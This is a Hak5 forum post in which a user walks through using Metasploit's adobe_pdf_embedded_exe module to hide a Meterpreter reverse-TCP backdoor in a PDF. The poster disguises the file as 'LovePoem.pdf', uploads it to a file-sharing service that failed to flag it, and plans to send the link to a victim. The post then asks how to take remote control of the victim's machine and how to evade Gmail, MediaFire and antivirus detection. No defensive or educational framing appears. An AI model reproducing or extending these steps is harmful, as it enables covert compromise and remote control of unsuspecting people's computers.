Jump to content
Hak5 Forums


  • Content count

  • Joined

  • Last visited

About Zer0Gravity

  • Rank
  1. Hello! In this post, I am going to tell you how I embedded a backdoor in a PDF file and uploaded onto the Internet. However, there are still some obscurities that I need YOUR help with. 1. Step: Preparation Download a random pdf file from the internet and save it to the "root directory" (Root directory --> Go to "places" and then "Home" and put it in there) 2. Step: Forging the backdoored file - go to terminal and execute the command "msfconsole" - after that, execute the command "use exploit/windows/fileformat/adobe_pdf_embedded_exe" - after that, execute the command "set payload windows/meterpreter/reverse_tcp" - after that, execute the command "set INFILENAME PutTheNameOfThePdfFileAlongsideWithTheExtensionHere" so for example: set INFILENAME book.pdf - after that, execute the command "set FILENAME DesiredOutputFileName.pdf" so for example: set FILENAME LovePoem.pdf - after that, execute the command "set LHOST IpOfTheAttackerGoesHere(your ip)" - after that, execute the command "exploit" 3. Step: Locating our creation After the backdoor has been successfully embedded to the PDF file, it is stored somewhere in the machine (it tells you where after the file is generated) Open up a terminal and execute "cd FileDestinationWithoutTheFileGoesHere" The output of the created file was: [*] Reading in '/root/book.pdf'... [*] Parsing '/root/book.pdf'... [*] Using 'windows/meterpreter/reverse_tcp' as payload... [*] Parsing Successful. Creating 'LovePoem.pdf' file... [+] LovePoem.pdf stored at /root/.msf4/local/LovePoem.pdf So open up the terminal and type "cd /root/.msf4/local/" After this command is executed, it moves our directory to the specified path. Then, execute the command "ls" to list all the files inside the directory. 4. Step: Copying the file to desktop After the file is located using the cd and ls commands, it has to be copied. - Execute the command: cp /root/.msf4/local/LovePoem.pdf /root/Desktop/ 5. Step: Uploading the file on the web After the file is forged and retrieved to dekstop, it has to be uploaded to the internet. Popular file sharing networks such as MediaFire and Gmail have recognised the infected file, but a file sharing network called "SendSpace" didn't. You can easily upload the file there and send the link to the victim. So now I need your help, to answer me to these questions: 1. After the victim has downloaded the file (let's assume that the antivirus hasn't detected it), how can I gain a remote access to it? (which commands do I need to execute etc. 2. How can I prevent the infected file from being detected by Gmail and Mediafire? 3. How can I prevent the infeted file from being detected by the anti virus? I appreciate all the time taken to read this post or answer any of the questions :D